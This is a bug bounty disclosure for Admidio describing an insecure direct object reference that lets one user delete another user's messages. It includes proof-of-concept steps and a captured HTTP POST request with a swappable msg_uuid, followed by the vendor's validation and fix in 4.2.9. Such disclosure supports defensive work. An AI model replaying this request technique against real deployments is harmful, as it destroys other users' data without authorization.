IDOR in message deletion in admidio/admidio

Valid

Reported on

Jun 11th 2023


Description

user can delete others's message. we know the report https://huntr.dev/bounties/24ae402f-220f-41c6-962e-47c26938986e/ , but we find that we do not fix one case.

Proof of Concept

1 user1 send admin a greeting card1

2 user2 send admin a greeting card2

3 user1 delete his message related to greeting card1, using burpsuite hijack the request.

POST /adm_program/modules/messages/messages.php?msg_uuid=7cd5f4ed-dedc-46c6-b4ec-3567246583ef HTTP/1.1
Host: localhost:8080
Content-Length: 49
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="98"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
sec-ch-ua-platform: "macOS"
Origin: http://localhost:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8080/adm_program/modules/messages/messages.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: BOXCLR=e%3DdXNlcjNAdGVzdC5jb20%3D%26p%3DJDJ5JDEwJEltbDNnQXl0di8xdy5wZFpWQW9pNi40UVhsSnd3R2h5OENCT0VCYVp3ZmhGc2paU3N5UzJx; ADMIDIO_admidio_adm_cookieconsent_status=dismiss; BBLANG=en_US; ADMIDIO_admidio_adm_SESSION_ID=beedb93711a4307d7d676817daeefd7b
Connection: close

admidio-csrf-token=6amCNCtp5js7GH8g2UwyHOU88PKm2M

4 changing the messges uuid as the message related to card2

5 result shows success

IDORs with unpredictable IDs are valid vulnerabilities see https://rez0.blog/hacking/cybersecurity/2022/08/18/unpredictable-idors.html

as the uuid is hard to predicate, we mark Attack Complexity as high

Impact

Impact of the Vulnerability:

This vulnerability allows a user to delete messages of other users, which can result in a loss of important communication data. This can also lead to unauthorized editing or deleting of messages, causing potential security issues for the impacted users. Additionally, an attacker may use this vulnerability to tamper with the message history and cover up their tracks, making it difficult to trace any malicious activity.

We are processing your report and will contact the admidio team within 24 hours. 9 months ago
lujiefsi modified the report
9 months ago
lujiefsi modified the report
9 months ago
We have contacted a member of the admidio team and are waiting to hear back 9 months ago
lujiefsi modified the report
9 months ago
Markus Faßbender validated this vulnerability 8 months ago
lujiefsi has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Markus Faßbender marked this as fixed in 4.2.9 with commit 3b248b 8 months ago
Markus Faßbender has been awarded the fix bounty
This vulnerability has now been published 8 months ago
to join this conversation